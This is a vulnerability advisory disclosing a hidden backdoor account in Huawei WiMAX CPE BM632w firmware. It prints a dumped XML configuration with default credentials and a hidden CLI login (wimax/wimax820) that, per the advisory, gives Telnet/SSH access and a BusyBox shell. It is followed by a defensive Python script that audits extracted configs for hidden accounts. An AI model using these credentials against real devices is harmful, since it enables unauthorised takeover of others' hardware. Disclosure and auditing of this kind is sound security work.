Exploit Title : Huawei Wimax CPE Bm632w Hidden Backdoor
Date : 30 May 2015
Exploit Author : Koorosh Ghorbani
Site : http://8thbit.net/
Vendor Homepage : http://www.huawei.com/
Platform : Hardware
Tested On : Mobinnet : Huawei Wimax CPE bm632w
Firmware Version: V100R001IRNC15B015
________________________________________________________
The binwalk output shows that the firmware contains an XML configuration file. This file defines a user with UserLevel = 0, which means Super Admin, because the admin has user level = 1. So the Huawei Wimax CPE BM632w upgrade firmware, version V100R001IRNC15B015, has a hidden user with UserLevel = 0 that cannot log in through the web panel but has full ATP access over Telnet and SSH. In the ATP shell, typing the "shell" command brings up a BusyBox shell. Here is part of the dumped XML file:
<UserInterface>
  <X_Web Timeout="5" FirstLogin="1">
    <UserInfo NumberOfInstances="2">
      <UserInfoInstance InstanceID="1" Username="admin" Userpassword="admin" UserLevel="2">
        <ObjExtention>
          <Userpassword HideBits="27"/>
        </ObjExtention>
      </UserInfoInstance>
      <UserInfoInstance InstanceID="2" Username="user" Userpassword="user" Userlevel="1">
        <ObjExtention>
          <Userpassword HideBits="27"/>
        </ObjExtention>
      </UserInfoInstance>
    </UserInfo>
  </X_Web>
  <X_Cli>
    <UserInfo NumberOfInstances="1">
      <UserInfoInstance InstanceID="1" Username="wimax" Userpassword="wimax820" Userlevel="0"/>
    </UserInfo>
  </X_Cli>
</UserInterface>
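
An added example, not part of the original advisory: a small audit script for configuration XML extracted from a firmware image, which lists CLI (Telnet/SSH) accounts that the web panel does not show. It assumes the X_Web / X_Cli layout seen in the dump above and, following the advisory, treats a lower UserLevel as more privileged; the function names and the sample values are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the same layout as the dump above (all values made up).
SAMPLE = """<UserInterface>
  <X_Web Timeout="5" FirstLogin="1">
    <UserInfo NumberOfInstances="1">
      <UserInfoInstance InstanceID="1" Username="webadmin" Userpassword="example1" UserLevel="2"/>
    </UserInfo>
  </X_Web>
  <X_Cli>
    <UserInfo NumberOfInstances="1">
      <UserInfoInstance InstanceID="1" Username="svc" Userpassword="example2" Userlevel="0"/>
    </UserInfo>
  </X_Cli>
</UserInterface>"""


def accounts(root, section):
    """Yield (username, level) for each UserInfoInstance under `section`."""
    for node in root.iter(section):
        for inst in node.iter("UserInfoInstance"):
            # The dump spells the attribute both "UserLevel" and "Userlevel",
            # so attribute names are matched case-insensitively.
            attrs = {k.lower(): v for k, v in inst.attrib.items()}
            level = attrs.get("userlevel", "")
            yield attrs.get("username", ""), int(level) if level.isdigit() else None


def hidden_cli_accounts(xml_text):
    """Return CLI accounts absent from the web panel, most privileged first."""
    root = ET.fromstring(xml_text)
    web_users = list(accounts(root, "X_Web"))
    web_names = {name for name, _ in web_users}
    web_levels = [lvl for _, lvl in web_users if lvl is not None]
    findings = []
    for name, lvl in accounts(root, "X_Cli"):
        if name in web_names:
            continue
        # Assumption from the advisory: a lower level number means more privilege.
        elevated = lvl is not None and (not web_levels or lvl < min(web_levels))
        findings.append({"username": name, "level": lvl, "elevated": elevated})
    return sorted(findings, key=lambda f: (f["level"] is None, f["level"] or 0))


if __name__ == "__main__":
    for finding in hidden_cli_accounts(SAMPLE):
        print(finding)
```

Any account this reports should be checked against the vendor's documented accounts, and remote Telnet/SSH management should be restricted where the device allows it.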